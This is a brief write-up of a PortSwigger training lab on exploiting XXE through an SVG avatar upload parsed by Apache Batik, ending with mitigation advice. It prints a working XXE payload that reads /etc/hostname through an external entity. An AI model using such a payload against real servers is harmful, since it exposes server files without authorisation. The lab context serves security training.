PortSwigger Lab: Exploiting XXE via image file upload
Task
This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the “Submit solution” button to submit the value of the server hostname.
Attempt
Apache Batik library is used for processing SVG iamges and it’s known to be vulnerable to XXE. (SVG uses xml format)
I used this classic payload from PayloadsAllTheThings and created a svg img file:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
The payloads that use expect:// don’t work with Apache Batik.
Uploaded this file as an avatar, checked it and it revealed the hostname.
Mitigation
Disable external entity resolution.
Disable XInclude.
Strip DOCTYPE and entities before parsing.